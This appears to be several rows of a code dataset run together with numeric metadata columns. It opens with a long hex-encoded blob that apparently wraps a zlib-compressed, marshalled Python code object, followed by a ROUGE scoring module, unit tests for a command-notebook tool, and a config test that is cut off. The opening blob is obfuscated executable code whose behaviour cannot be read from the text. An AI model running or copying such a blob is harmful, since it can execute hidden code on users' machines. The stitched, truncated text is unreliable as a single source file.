6425C78653224695C7838635B5C7864646F5C7830656B5C786563555C7865335C7831347C5C783865485C7830385C7863396D775B7229635C783936795C7863385C7862393C3D7E5C7866665C7865395C78643449235C7839303238495C7831385C7838656C5C7831385C786434355C7865305C7863665C7831314446645C7838615C7830312C5C7839325C7838354C616E5B5C7838355C7839635C7831655C7863305C7864385C74475C7866655C7863615C786134535C7863645C786364565C783063255C7831365C7830303D4A485C7863305C7864395C78383449615C7837665C7863305C783839205B3C325C786535445C7863345C7866364A4B5C7831304B5C7839393B5C7831665C7861665C7861662F2E4B5C786465455C786239445C7830635C7831345C786637525C7862635C7830385C7864345C7839637C572B5C786332515C7831345C7863333A5C7831312E5C7863305C7839315B5C7864625C7862615C7830315C7866335C7866645C7865335C7831395C7863395C7861345C786435435C786536385C275C7831635C7830665C7830655C7839645C783833215C7862325C7838665C7862335C783838335C7831615C786264455C7839615C7838383E5C7864315C7838635C783065763D675C786538785C7864655C78646568705C7862305C7865375C7861305C7839625C7862375C783838465D745C78303126255C783162785C7838655C78656239236F5C7831375C7866645C7831355C7839345C7863335C7862615C7830655C7865305C7864357D63765C7865665C7838645C7831355C783830665C7839385C7831305C7863635C7863645C7861655C7866313B755C7861315C7866335C7866315C783066635C7861345C7831665C7838645C7838345C7863645C7839386F595C7839365C7838315C7830325C7862385C7831345C7865635C7838315C7866655C7861315C7865613F405C7863365C7839335C7866615C786266435C7865385C743D5C7863315C7830665C7865395C7830375C7866645C7830375C7839635C7861375C7861305C7861625F5C7831355C276871405C7865365C7830665C7866305C786163755C7830364F5C786462325C7862355C7831655C7866355C7831665C7830345C7839615C7861333C5C783138685C7864334F5C7838315C7831657057525C7830635C7861335C7866665C7861622F5C786333405C7863375C7838355C7838635C745C78303735475C7865385C7831645C7863645C783936385C7861355C7839395C7838317E5C7861305C78663263315C786431445C7862357A5C78653268305C783938515C7831395C7831375C7831335C27645C78653960525C7838645C7865625C78633343465C725C78663437565C5C5C78313
75C7831335C786132465F735C7831613E5C7830305C7865365C7838634D5C725C7866345C783065605C783133395C7839336B5A5C7861345C7865325C7865375C7838615C7865644C2A5C786165525C7866395C7839627C475C7861665C5C6A5C7862645C7838635C7831335C786336395C786563645C783135485C7831394E5C745C7838345C783935595C7862626F5C7864365C7863635C7830625C7863382C735C786336235C7863645C7831635C7831355C7861365C7830315C7865625C78636472785C786233242F5C783838655C786363635C7839615C783130645C7839375C7863345C7839615C7864612D5C786637775C78636569265C7839315C7838615C7830665C7866645A5C7861635C786563703C5C783066685C7839365C7831375C786432365C7864315C786635787C5C7838656E5C7861654E2F3F5C7831665C7837663A3D42665C786239755C7865395C7831345C7864392B5C7830315C7831666D5C7866385A595C7865385C7865342B5C7866375C786236745E5C7831635F5D7D5C7831395F5C7862656F745C7864367A57425C7838645C7864657A5C7839615C7839355C7864655C7866612A67605C78613273365C7839625C7839315C783038325C7830665C783132455C786138365C7865385C786234485C783932255C7863325C783032783B5C7863645C7863345A5C7861325C7864625C7864395C7861385C7862656A5C7830305C7861372A47585C725C7838625C7863305C7864625C7866335C7864365C786266705C7839365C786364505C7862335C7831325C7864665C7839395C786164516B496E5C7831315C7863645C7866612C5C275C7864396B21355C7866305C7838365C78646570305C7864635C78316464645C7864655C7839375C7838345C7861375C7863355C7861325C7830665C7865345C7831345C786432545C7837665C786361784D5C78396143585C78663771215C7839395C7831335C786362345C7862315C7862612F5C7839386D525C7863335C7866362C5C78646133685C7830326D6D5C7830365C7866665C7830375C7865665F5C7866305C5C5D5C783036645C783766585C7862395C7830375C7831625C7865325C78613023293C5C7861395C5C6B396A5C7863375C7866342C5C7863375C7861396E5C7830655C7862325C7865655C7838645C7830655C786438424C5C7863355C7838345C7831655C7830385C7830325C7831643D5D5C7864625C7862635C7865335C7862375C7866665C7866655C7864373F5C786566555C786434405C78303541675C7831393277585C7862375C78663756575C7831385C7831395C786231423A5C7864335C7861345C783830425C7864307D5C7864625C7838655C7839324E473B5C783930283
95C7862625C78626259245B5C7864655C7863615C7862615C7839375C7864302F5C7865635C783831485C786630545C786131675C7839625C7865305C783966634249585C7839665C7864385C7839615C7839365C7865644A582F5D595C7861365C7865645C7831665C786339525C7831375C7865395C7864655C786439585C7864665C7864375C7866365C7863345C7839615C7831615C7839655C7861323E5C783966226D5C7865635C783137615B5C7863365C7838325C7861645C7864325C7863315C7831365C7864315C786263752B5C7862385C7864305C7831375836745C783961625C7839615C7830633E5C7831375C7865395C7830345C7864322F5C7861636B5C7831335C7866635C7864625C7866615C7863635B5C786166257A5C7861635C7866375C275C7862615C783036485C7862325C7865645C7864317B5C7863335C7864665C7839625C786664355C7862325C7838363A5C783038634643626F5C786334415C783962575C783832305C745C786533765C7861615C7862395C786362205C7838625C7866385C7866655C7831665C7864315A5C7865325C7864325C7838337C5C7864335C7864635C7864635C7830375C7865305C786562775C7866375C7865385C7830335C7838355C7864655C7830355C7862635C725C7863625C7863635C7839332C375C7864645C7862315C7865625C7839645C786234525C7865355C7839395C7863665C7861655C7863312F5C783832785C783861435C7837663D375C7830325C7839345C7839325C78623460425C7831665C745C275C7861642C395C7838355C7831385C7866355C7864625C786431345C786466603B734E255C786231415C7866625C7830363D4C5C783938585C7863375C786232692573265C7861346D35355C7839335C7865333C76405C7839634C5C7861305C7839335C7864355C7866623A255C783833295C786137245C7838625C7863345C783966525C783032415C7831615C7866394A5C7865345C7866625C783832465C786332775C78383770795C7863335C7862645C7863335C7861313B725C786637475C786466635C7865645C7837665C786130223F5C7866335C7861645C7839645C7839365C7831625C7864665C786361295C7866335C7866395C786463595C7838325C783962505C7839335C7862354D5C7864355C78383965245C7831395C7864635C7839635C7839635C7839645C7830635C7864645C7866335C7865355C786439785C783866415C786336715C7866665C7863325C7864657C5C7861305C7861334F5C7866335C7865375C7866335C7863365C7863627B686D5C7864315C7864635C786235455C7864335C7830625C7865625C7864615C7865645C7831345C7862615C7838613
2575C275C783963355C7862665C7866355C7863615C7838325C7865645C7838655C7864655C7865375C7839644E6B5C7838375C7861625C7830635C78653440225C7864325C7830333A5C7861665C7862395C7864355C7866395C7863365C7862655C7865653C6B5C7862335C7864335C7838615C7861333A5C786164592B5C7863376F775C786565555C783037785C7866365C7831397D395C7862625C7866655C7838383E5C7831635C7839665C7839635C7862655C7831625C7838665C78376654745C783062355C783132705C7861375C7865645C7863326C295C7863315C7862335C7866375C7830335C7862645C7862645C7861315C786633295C7838645C7863645C7864355C7861305C7865615C7831305C786533545C7866377268535C7866325C7861615C7861313A335C7861627B5C744A5C7830375C7862615C7865325C7831325C7839307A755C7864335C745C783136346C455C7839355C7831365C7861632058355C786465375C7839375C7865375C786435415C7861345C7862334A5C7864625C7839395C7864615C7839655C7864375C7864305C7866315C7863315C74465C7861304C5C786535765C786138255C7831395C7830305C78316636675C7831655C783035685C7838645C7831615C7831635C7838655C7861385C7864345C7830655C783831235C7830315C7831385C7839355C7838632F5C7831642A5C7830325570604E5C7864375C7864305C7830625C7839354C415C7831325C7831305C7830665C786130625C786134765C7863365C78666461255C7861335C7864656F2D5C7861325C7864305C7862305C786565415C783830465C786562745C7838355C783833265C783033425C7839355C783961625C783932565C7831365C7865315C7831345C7830385C7831635C7861305C783031605C7866305C786163695C7831307A5C7839365C7863305C7838665C7861345C7831665C783931475C786338595C7839365C786361325C7863305C786433735C786163215C7865625C7830383A5C7838335C7864655C7830335C7865373478204B5C7866665C7865305C7863305C7863335C7830375C7861335C7863335C7865315C7865655C783162375C7863325C7838375C7830375C786662436F323D5C7864635C786337435C7863665C7838645C7861325C7864305C78316445215C275C7831315C78396330285C7862342A5C7838315C5C5C7865365C7863345C7861667B5C275C786564346C3C5C7831615C786564585C7863615D2C5C7866643F5F5C7838643F5C786333715C7830345C7838655C7831635C7839325C783034295C783065635C7839615C7839315C783830465C7862655C7864625C7831305C7838353A7D325C7863385C7861395C786
6615C7865635C6E5C7839623A61214E5C7838384F5C7862325C7865305C7865365C7861615C7864615C786632505C78623163476F5C7838615C7864615C783134585C7830315C783034762C5C786165665C7839615C7830354224705C7839325C7831325C7861635C7865305C7839305C7830315C7866635C7865315C7861335C7865663A5C786333375C7864655C78663420245C7838375C7864335C7866645C7864315C7863345C7838355C786337515C7865387A5C786262615C7865385C7865645C783865765C7866375C7866315C7830385C7865667A5C7839365C7839653A5C7839635C786231315C7838305C7866365C783933595C7863645C7864653C325F5C7839625C7862665C7864393337215C7830305C7861395C786461335C7865306A5C7831635C786363235C7831615C7866355C7863635C7831325C783036602B20545C7863617C5C7830365C7830635C7865305C786261205C7866355C783132225C7831355C7862625C7838345C7830355E343040285C7862315C7830315C7863325C6E5C7831645C786130366E5C7831635C7830313E3D5C786633397C40645C783038235C7831665C7839356267685C7866655C78616371585C7866385C7864355C7864375C7830355C7830373A285C7864624C5C7861335C786264325C7861613B5C7830625C7861375C7863385C7864355C7838375C7830385C7831625C7838325C7861345C786134605C7837665C7865315C786334645C7831315C7864315C7831395C786134705C7862625C7864625C786330585C7830665C7866635C7863395C7838325C7861315C7864365C7831315C7866655C786239645C78393551695C7864365C7864625C783131706E6778755C7864655C783834265C7866305C783931705C275C78386673535C786362705C7862665C7861395C7831305C7831305C786362365C7861385C7865385C7865355C7839385C786533545C7866385C786361505C7861395C7866375C7861625C7861663E7D385C7865615C7862302E6C5C786565485C7862325C78393025235C7838635C275C7839627D5C783866355C7862375C7831615E555C7861345C7862655C7864655A5C7865625C7866355C7863325C7862615F5C725C7861385C786162555C7861375C7864335C7861343D5C7865622E5C7862625B5C7862385C7839335B5C7866375C7865645C7861315C7839375C786561545C7861375C7862625C7838625C786162555C7865375C7838666A5C7866657E5A5C7864395C7866612F5C7839375C7831635C7838645C7863625C7866665C7861326E5C7862655C7838305C7863635C786162355C786135495C7861395C7863667C2872365C7862655C7831305C7831645C7861645C7863305C7866645
549762B5C7863625C7861615C7866635C7831365C7863365C7830345C7863655C7830345C7830635C7838345A5C7865395C7861645C7861355C7866644C2241482A5C7839305C7838635C786231445C7830303D5C7866345C783930615C7863385C6E585C5C5C7830387C5C7838345C7864314A5C7863397A3A5C7864375C7861625C7862375C7864365C7864365C7839365C7865625C7862305C7864395C7861316F79555C78396578367D5C7861384B57555C786562605C78616173755C7830365C7866615C725C7866365C7839615C7864365C7830315C7839655C725C783830205C7830385C7864345C7831392A5C7830385C7861305C7863335C783038205C786233405C7838625C783161545C783864465C7864353D5C7866655C7830375C786538772164285C7830325C7830305C7830305C783030745C7830345C7830305C7830305C7830307A6C6962745C6E5C7830305C7830305C7830306465636F6D7072657373285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030285C7830305C7830305C7830305C783030735C7830345C7830305C7830305C7830305C7831625B306D745C7830385C7830305C7830305C7830303C6D6F64756C653E5C7830345C7830305C7830305C783030735C7830325C7830305C7830305C7830305C7830635C783031272929')) | 2,624.8 | 13,008 | 0.997638 | 18 | 13,124 | 727.277778 | 0.888889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.857361 | 0.001067 | 13,124 | 5 | 13,008 | 2,624.8 | 0.14119 | 0.007239 | 0 | 0 | 0 | 0 | 0.996622 | 0.996622 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 12 |
ba9cf909d3469116e35a97edb0a9d7aa93dded4e | 2,229 | py | Python | calculate_metrics.py | qwang70/PreSumm | b2c3aee0ada7f5fa8754dffd44355b956fe0d45b | [
"MIT"
] | 1 | 2019-12-13T05:45:56.000Z | 2019-12-13T05:45:56.000Z | calculate_metrics.py | qwang70/PreSumm | b2c3aee0ada7f5fa8754dffd44355b956fe0d45b | [
"MIT"
] | null | null | null | calculate_metrics.py | qwang70/PreSumm | b2c3aee0ada7f5fa8754dffd44355b956fe0d45b | [
"MIT"
] | 1 | 2019-12-02T21:56:16.000Z | 2019-12-02T21:56:16.000Z | # import...
def compute_precision(ref, candidate):
    """
    Same as Rouge-1 Precision.
    Compute the percentage of the words in the candidate summary
    that are also present in the reference summary.
    Input:
        ref: String
        candidate: String
    Return: float (0.0 when the candidate contains no words)
    Ignore non-words like <q>, \n, period, comma...
    Example:
        ref: the cat was under the bed
        candidate: the cat was found under the bed
    Result: 6/7=0.86
    """
    import re  # local import so this block stays self-contained

    def _words(text):
        # Drop the <q> sentence separator, lowercase, and keep only
        # alphanumeric word tokens (strips punctuation and whitespace).
        return re.findall(r"[a-z0-9']+", text.lower().replace("<q>", " "))

    cand_tokens = _words(candidate)
    if not cand_tokens:
        return 0.0  # empty candidate: avoid ZeroDivisionError
    ref_words = set(_words(ref))
    matched = sum(1 for tok in cand_tokens if tok in ref_words)
    return matched / len(cand_tokens)
def compute_recall(ref, candidate):
    """
    Same as Rouge-1 Recall, or simply Rouge-1.
    Compute the percentage of the words in the reference summary
    that are also present in the candidate summary.
    Input:
        ref: String
        candidate: String
    Return: float (0.0 when the reference contains no words)
    Ignore non-words like <q>, \n, period, comma...
    Example:
        ref: the cat was under the bed
        candidate: the cat was found under the bed
    Result: 1.0
    """
    import re  # local import so this block stays self-contained

    def _words(text):
        # Drop the <q> sentence separator, lowercase, and keep only
        # alphanumeric word tokens (strips punctuation and whitespace).
        return re.findall(r"[a-z0-9']+", text.lower().replace("<q>", " "))

    ref_tokens = _words(ref)
    if not ref_tokens:
        return 0.0  # empty reference: avoid ZeroDivisionError
    cand_words = set(_words(candidate))
    matched = sum(1 for tok in ref_tokens if tok in cand_words)
    return matched / len(ref_tokens)
def compute_f1(ref, candidate):
    """
    Compute the Rouge-1 F1 score: the harmonic mean of Rouge-1
    recall and Rouge-1 precision.
    Input:
        ref: String
        candidate: String
    Return: float (0.0 when both recall and precision are 0)
    """
    # Fixed typo: parameter was spelled `candiate` while the body used
    # `candidate`, which raised NameError on every call.
    recall = compute_recall(ref, candidate)
    precision = compute_precision(ref, candidate)
    if recall + precision == 0:
        return 0.0  # guard against ZeroDivisionError
    return 2. * recall * precision / (recall + precision)
def compute_rouge2_precision(ref, candidate):
    """
    Compute the percentage of the 2-grams words in the candidate summary
    that are also present in the reference summary.
    Input:
        ref: String
        candidate: String
    Return: float (0.0 when the candidate has fewer than two words)
    Ignore non-words like <q>, \n, period, comma...
    Example:
        ref: the cat was under the bed
        candidate: the cat was found under the bed
    Result: 0.67
    """
    import re  # local import so this block stays self-contained

    def _words(text):
        # Drop the <q> sentence separator, lowercase, and keep only
        # alphanumeric word tokens (strips punctuation and whitespace).
        return re.findall(r"[a-z0-9']+", text.lower().replace("<q>", " "))

    cand_tokens = _words(candidate)
    cand_bigrams = list(zip(cand_tokens, cand_tokens[1:]))
    if not cand_bigrams:
        return 0.0  # no bigrams: avoid ZeroDivisionError
    ref_tokens = _words(ref)
    ref_bigrams = set(zip(ref_tokens, ref_tokens[1:]))
    matched = sum(1 for bg in cand_bigrams if bg in ref_bigrams)
    return matched / len(cand_bigrams)
def compute_rouge2_recall(ref, candidate):
    """
    Compute the percentage of the 2-grams words in the reference summary
    that are also present in the candidate summary.
    Input:
        ref: String
        candidate: String
    Return: float (0.0 when the reference has fewer than two words)
    Ignore non-words like <q>, \n, period, comma...
    Example:
        ref: the cat was under the bed
        candidate: the cat was found under the bed
    Result: 0.8
    """
    import re  # local import so this block stays self-contained

    def _words(text):
        # Drop the <q> sentence separator, lowercase, and keep only
        # alphanumeric word tokens (strips punctuation and whitespace).
        return re.findall(r"[a-z0-9']+", text.lower().replace("<q>", " "))

    ref_tokens = _words(ref)
    ref_bigrams = list(zip(ref_tokens, ref_tokens[1:]))
    if not ref_bigrams:
        return 0.0  # no bigrams: avoid ZeroDivisionError
    cand_tokens = _words(candidate)
    cand_bigrams = set(zip(cand_tokens, cand_tokens[1:]))
    matched = sum(1 for bg in ref_bigrams if bg in cand_bigrams)
    return matched / len(ref_bigrams)
def compute_rouge2_f1(ref, candidate):
    """
    Compute the Rouge-2 F1 score: the harmonic mean of Rouge-2
    recall and Rouge-2 precision.
    Input:
        ref: String
        candidate: String
    Return: float (0.0 when both recall and precision are 0)
    """
    # Fixed typo: parameter was spelled `candiate` while the body used
    # `candidate`, which raised NameError on every call.
    recall = compute_rouge2_recall(ref, candidate)
    precision = compute_rouge2_precision(ref, candidate)
    if recall + precision == 0:
        return 0.0  # guard against ZeroDivisionError
    return 2. * recall * precision / (recall + precision)
| 22.744898 | 73 | 0.646927 | 300 | 2,229 | 4.756667 | 0.18 | 0.067274 | 0.050456 | 0.061668 | 0.910301 | 0.789068 | 0.755431 | 0.755431 | 0.720392 | 0.639103 | 0 | 0.016109 | 0.275908 | 2,229 | 97 | 74 | 22.979381 | 0.86803 | 0.709735 | 0 | 0.375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.375 | false | 0.25 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
bad3a56f6f4e37a35730bc4e298b1d23a302ca6e | 11,004 | py | Python | tests/test_cmdnote.py | zianke/cmdnote | 725271a195748092a9a4134ae9d4167dcff4803d | [
"MIT"
] | null | null | null | tests/test_cmdnote.py | zianke/cmdnote | 725271a195748092a9a4134ae9d4167dcff4803d | [
"MIT"
] | null | null | null | tests/test_cmdnote.py | zianke/cmdnote | 725271a195748092a9a4134ae9d4167dcff4803d | [
"MIT"
] | null | null | null | from unittest import TestCase
from unittest.mock import patch
import tempfile
from cmdnote import CmdNote, const, exception
from .utils import *
class TempCmdNote():
    """Context manager that yields a CmdNote backed by temporary files.

    Fresh NamedTemporaryFile objects are created for the notebook and the
    config on entry, so every test starts from an empty state; both files
    are closed (and thereby deleted) on exit.
    """
    def __enter__(self):
        self.notebook_fd = tempfile.NamedTemporaryFile()
        self.config_fd = tempfile.NamedTemporaryFile()
        return CmdNote(self.notebook_fd.name, self.config_fd.name)
    def __exit__(self, exc_type, exc_value, exc_traceback):
        # Parameters renamed from `type`/`value` so builtins are not shadowed.
        self.notebook_fd.close()
        self.config_fd.close()
class TestCmdNote(TestCase):
    """Unit tests for CmdNote.

    Each test builds a CmdNote on throwaway temp files (via TempCmdNote),
    captures regular output with captured_output() and the shell-eval
    stream with captured_sys_stdout(), and patches cmdnote.ui.get_action
    to simulate the user's execute/abort choice.
    """
    def test_func(self):
        """func() prints the shell wrapper function definition."""
        with TempCmdNote() as cmdnote:
            with captured_sys_stdout() as sysout:
                cmdnote.func()
            output = sysout.getvalue().strip()
            self.assertEqual(output, 'function cmdnote() { eval "$(command cmdnote "$@")"; }')
    def test_append(self):
        """append() adds commands from a file and/or a literal string to
        the end of the notebook; the command index stays at 0."""
        with TempCmdNote() as cmdnote:
            cmdnote.append(None, None)
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 0)
            self.assertEqual(command_idx, 0)
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 4)
            self.assertEqual(command_idx, 0)
        with TempCmdNote() as cmdnote:
            cmdnote.append(None, 'echo "hello"\nls -l')
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 2)
            self.assertEqual(command_idx, 0)
        with TempCmdNote() as cmdnote:
            # Appended text lands after the commands read from TEST_FILE.
            cmdnote.append(TEST_FILE, None)
            cmdnote.append(None, 'echo "hello"')
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 5)
            self.assertEqual(command_idx, 0)
            self.assertEqual(commands[0], 'ls -l')
            self.assertEqual(commands[-1], 'echo "hello"')
    def test_insert(self):
        """insert() places new commands before the existing ones; the
        command index stays at 0."""
        with TempCmdNote() as cmdnote:
            cmdnote.insert(None, None)
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 0)
            self.assertEqual(command_idx, 0)
        with TempCmdNote() as cmdnote:
            cmdnote.insert(TEST_FILE, None)
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 4)
            self.assertEqual(command_idx, 0)
        with TempCmdNote() as cmdnote:
            cmdnote.insert(None, 'echo "hello"\nls -l')
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 2)
            self.assertEqual(command_idx, 0)
        with TempCmdNote() as cmdnote:
            # Unlike append, the second insert goes to the front.
            cmdnote.insert(TEST_FILE, None)
            cmdnote.insert(None, 'echo "hello"')
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 5)
            self.assertEqual(command_idx, 0)
            self.assertEqual(commands[0], 'echo "hello"')
            self.assertEqual(commands[-1], 'echo $MY_ENV_VAR')
    def test_list(self):
        """list() prints only the not-yet-consumed commands; list(True)
        also includes the already-consumed ones."""
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            with captured_output() as (out, err):
                cmdnote.list()
            output = out.getvalue().strip()
            self.assertEqual(len(output.split('\n')), 4)
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            cmdnote.notebook.move_commands(1)
            with captured_output() as (out, err):
                cmdnote.list()
            output = out.getvalue().strip()
            self.assertEqual(len(output.split('\n')), 3)
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            cmdnote.notebook.move_commands(1)
            with captured_output() as (out, err):
                cmdnote.list(True)
            output = out.getvalue().strip()
            self.assertEqual(len(output.split('\n')), 4)
    def test_next(self):
        """next() shows the upcoming command; the index advances only when
        the (patched) user action is execute, not on abort or when the
        notebook is empty."""
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            with captured_output() as (out, err):
                with captured_sys_stdout() as sysout:
                    with patch('cmdnote.ui.get_action', lambda *args: const.ACTION_EXECUTE):
                        cmdnote.next()
            # Execute: shown to the user AND emitted for shell eval.
            self.assertTrue('ls -l' in out.getvalue().strip())
            self.assertTrue('ls -l' in sysout.getvalue().strip())
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 4)
            self.assertEqual(command_idx, 1)
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            with captured_output() as (out, err):
                with captured_sys_stdout() as sysout:
                    with patch('cmdnote.ui.get_action', lambda *args: const.ACTION_ABORT):
                        cmdnote.next()
            # Abort: shown to the user but NOT emitted for shell eval.
            self.assertTrue('ls -l' in out.getvalue().strip())
            self.assertTrue('ls -l' not in sysout.getvalue().strip())
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 4)
            self.assertEqual(command_idx, 0)
        with TempCmdNote() as cmdnote:
            with captured_output() as (out, err):
                with patch('cmdnote.ui.get_action', lambda *args: const.ACTION_EXECUTE):
                    cmdnote.next()
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 0)
            self.assertEqual(command_idx, 0)
    def test_prev(self):
        """prev() replays the previously consumed command; the index stays
        where it was regardless of execute/abort."""
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            cmdnote.notebook.move_commands(1)
            with captured_output() as (out, err):
                with captured_sys_stdout() as sysout:
                    with patch('cmdnote.ui.get_action', lambda *args: const.ACTION_EXECUTE):
                        cmdnote.prev()
            self.assertTrue('ls -l' in out.getvalue().strip())
            self.assertTrue('ls -l' in sysout.getvalue().strip())
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 4)
            self.assertEqual(command_idx, 1)
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            cmdnote.notebook.move_commands(1)
            with captured_output() as (out, err):
                with captured_sys_stdout() as sysout:
                    with patch('cmdnote.ui.get_action', lambda *args: const.ACTION_ABORT):
                        cmdnote.prev()
            self.assertTrue('ls -l' in out.getvalue().strip())
            self.assertTrue('ls -l' not in sysout.getvalue().strip())
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 4)
            self.assertEqual(command_idx, 1)
        with TempCmdNote() as cmdnote:
            with captured_output() as (out, err):
                with patch('cmdnote.ui.get_action', lambda *args: const.ACTION_EXECUTE):
                    cmdnote.prev()
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 0)
            self.assertEqual(command_idx, 0)
    def test_seek(self):
        """seek() repositions the command index: seek(2) from the start
        lands on 2, and seek(-1) from index 2 lands on 1."""
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            cmdnote.seek(2)
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 4)
            self.assertEqual(command_idx, 2)
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            cmdnote.notebook.move_commands(2)
            cmdnote.seek(-1)
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 4)
            self.assertEqual(command_idx, 1)
    def test_clear(self):
        """clear() drops pending (unconsumed) commands while keeping the
        consumed history; clear(True) wipes everything."""
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            cmdnote.clear()
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 0)
            self.assertEqual(command_idx, 0)
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            cmdnote.notebook.move_commands(1)
            cmdnote.clear()
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 1)
            self.assertEqual(command_idx, 1)
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            cmdnote.notebook.move_commands(1)
            cmdnote.clear(True)
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 0)
            self.assertEqual(command_idx, 0)
    def test_play(self):
        """play() emits every remaining command for shell eval and moves
        the index to the end; repeat=N emits the sequence N times."""
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            with captured_sys_stdout() as sysout:
                cmdnote.play()
            output = sysout.getvalue().strip()
            # TEST_FILE contains 'ls -l' twice among its 4 commands.
            self.assertEqual(output.count('ls -l'), 2)
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 4)
            self.assertEqual(command_idx, 4)
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            with captured_sys_stdout() as sysout:
                cmdnote.play(repeat=5)
            output = sysout.getvalue().strip()
            self.assertEqual(output.count('ls -l'), 10)
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 4)
            self.assertEqual(command_idx, 4)
    def test_config(self):
        """config(capacity=N) trims stored commands to fit N, raising
        NotebookCapacityError when pending commands would not fit;
        config() with no args prints the current settings dict."""
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            cmdnote.notebook.move_commands(3)
            cmdnote.config(capacity=2)
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 2)
            self.assertEqual(command_idx, 1)
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            cmdnote.notebook.move_commands(1)
            self.assertRaises(exception.NotebookCapacityError, cmdnote.config, capacity=2)
            commands, command_idx = cmdnote.notebook.read_commands()
            self.assertEqual(len(commands), 4)
            self.assertEqual(command_idx, 1)
        with TempCmdNote() as cmdnote:
            cmdnote.append(TEST_FILE, None)
            with captured_output() as (out, err):
                cmdnote.config()
            output = out.getvalue().strip()
            self.assertTrue('capacity' in eval(output))
| 45.659751 | 98 | 0.587786 | 1,178 | 11,004 | 5.35399 | 0.078947 | 0.133185 | 0.075472 | 0.106548 | 0.900111 | 0.881877 | 0.877438 | 0.852069 | 0.852069 | 0.852069 | 0 | 0.00916 | 0.305525 | 11,004 | 240 | 99 | 45.85 | 0.816148 | 0 | 0 | 0.765487 | 0 | 0 | 0.031897 | 0.01145 | 0 | 0 | 0 | 0 | 0.292035 | 1 | 0.053097 | false | 0 | 0.022124 | 0 | 0.088496 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
bad8a2e49db8e427110bccf3ab4120cf8593c8c0 | 947 | py | Python | app/tests/unit/test_config.py | sun-fengcai/flask_template | fc6c5963ac9ac632c83d81c7b62ab74d7e99d02d | [
"MIT"
] | 3 | 2019-11-16T06:51:17.000Z | 2019-11-21T01:18:31.000Z | app/tests/unit/test_config.py | sun-fengcai/flask_template | fc6c5963ac9ac632c83d81c7b62ab74d7e99d02d | [
"MIT"
] | 27 | 2019-11-17T13:56:49.000Z | 2021-06-28T12:04:18.000Z | app/tests/unit/test_config.py | sun-fengcai/flask_template | fc6c5963ac9ac632c83d81c7b62ab74d7e99d02d | [
"MIT"
] | 1 | 2021-04-23T23:57:28.000Z | 2021-04-23T23:57:28.000Z | import os
def test_development_config(test_app):
test_app.config.from_object("app.config.DevelopmentConfig")
assert test_app.config.get("SECRET_KEY")
assert not test_app.config["TESTING"]
assert test_app.config["SQLALCHEMY_DATABASE_URI"] == os.environ.get(
"DATABASE_URL"
